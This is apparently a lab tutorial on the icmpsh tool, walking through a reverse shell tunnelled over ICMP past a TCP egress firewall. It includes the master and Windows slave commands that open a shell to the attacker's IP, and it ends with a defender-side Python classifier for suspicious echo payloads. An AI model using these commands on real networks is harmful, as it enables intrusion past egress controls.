Foreword
A very old technique, but worth learning.
Brief introduction to how the ICMP protocol works
Internet Control Message Protocol (ICMP) is one of the protocols of the Internet protocol suite. Network devices, including routers, use it to send error messages and operational information, for example that a requested service is unavailable or that a host or route is unreachable. The ping command works at layer 3, the network layer, and sends its message in the ICMP payload; the packet is then encapsulated with an IP header. Because of the MTU limit, an ICMP packet cannot be larger than 1500 bytes.
ICMP packets at the network layer
The ping command sends an ICMP echo request to the target host. If the target host replies with an echo reply, the host is alive.
Scenario introduction
Network administrators sometimes deploy a variety of firewalls, which makes penetration testing very difficult. Consider a firewall like this: it only allows traffic from known machines on known ports and services (ingress filtering) and has strict egress access control list settings.
Suppose you already control a machine on the internal network or in part of the DMZ. A reverse shell could not be obtained over TCP, so a bind shell is not even considered.
Apart from TCP, the usual options are a DNS tunnel over UDP or an ICMP channel to obtain a reverse shell. ICMP is the focus of this tool: icmpsh is a simple reverse ICMP shell.
It provides a master in C ( icmpsh-m.c ), Perl ( icmpsh-m.pl ) and Python ( icmpsh_m.py ), all POSIX compatible, together with a win32 slave.
Its main advantage over other similar open source tools is that it does not require administrator rights to run on the target machine. The tool is simple, convenient and portable (cross-platform).
This tool is mainly aimed at Windows and uses a client/server architecture: the slave (client) is written in C and can only run on Windows,
while the master (server) is cross-platform; the author ported the C and Perl masters to Python.
For detailed usage, please refer to:
https://github.com/inquisb/icmpsh#usage
Local experiment
victim (hacked): 192.168.41.128
attacker (hacker): 192.168.41.136
First, on the victim machine, I set up an outbound firewall rule for protocol type TCP on port 6060.
We use Python 2.7 on Kali to start a server listening on port 6060.
Port 80 is served by the Apache server.
Local access
Then, from the target machine, access the designated port to test whether the outbound rule behaves as expected.
If no port is specified, the default port 80 is accessed.
This only serves to verify that even when the server has an egress access control list configured, a reverse shell can still be completed over the ICMP protocol.
time:
Use the first command to turn off the kernel's ping replies; this prevents the kernel from responding to the echo requests itself, so that only the attacker's master handles them.
sysctl -w net.ipv4.icmp_echo_ignore_all=1 > /dev/null
python icmpsh_m.py 192.168.41.136 192.168.41.128   # python icmpsh_m.py <attacker ip> <victim ip>
Here an error occurred, so I read the .py file.
Then, annoyingly, Kali had no pip. Reference: https://www.cnblogs.com/foe0/p/12217108.html
Installing it was painfully slow, installing a package after that was also painfully slow, and then the new version of Kali did not have vxxxy installed and I had to go and configure it, a whole series of issues.
windows:
icmpsh.exe -t 192.168.41.136 -d 500 -b 30 -s 128
Execute whoami
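Defender-side detection for the traffic pattern described above, as an added example that is not code from the original post or from the icmpsh project. It parses ICMP echo requests and flags payloads that do not match the stock Windows and Linux ping payloads; the allowlist values, the packet builder and the sample packets are constructed here for the example.

```python
import struct

# Payloads emitted by the stock ping clients, used as a defender-side allowlist (constructed here).
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"   # 32 bytes
LINUX_PING_PATTERN = bytes(range(0x10, 0x40))                 # 48 bytes after the 8-byte timestamp
MAX_ICMP_PAYLOAD = 1500 - 20 - 8   # 1500-byte MTU minus IPv4 header and ICMP header


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over the ICMP header and payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(payload: bytes, ident: int = 0x1234, seq: int = 1) -> bytes:
    """Constructed sample packet: ICMP echo request (type 8, code 0) carrying payload."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload


def classify_echo_request(packet: bytes) -> str:
    """Return 'benign' for a stock ping payload, otherwise why the packet looks like tunnelled data."""
    if len(packet) < 8:
        return "malformed"
    icmp_type, code, csum, _ident, _seq = struct.unpack("!BBHHH", packet[:8])
    if icmp_type != 8 or code != 0:
        return "not-echo-request"
    # Recompute the checksum with the checksum field zeroed and compare with the stored value.
    if icmp_checksum(packet[:2] + b"\x00\x00" + packet[4:]) != csum:
        return "bad-checksum"
    payload = packet[8:]
    if payload == WINDOWS_PING_PAYLOAD:
        return "benign"
    if len(payload) == 56 and payload[8:] == LINUX_PING_PATTERN:
        return "benign"
    if len(payload) > MAX_ICMP_PAYLOAD:
        return "oversized-payload"
    # Command output carried in an echo payload is typically printable text, unlike ping fillers.
    if payload and all(32 <= b < 127 or b in (9, 10, 13) for b in payload):
        return "printable-text-payload"
    return "nonstandard-payload"
```

Feeding the same classifier the echo requests captured on a sensor (for example from a pcap) gives a quick triage of which hosts send echo payloads that no stock ping client would produce.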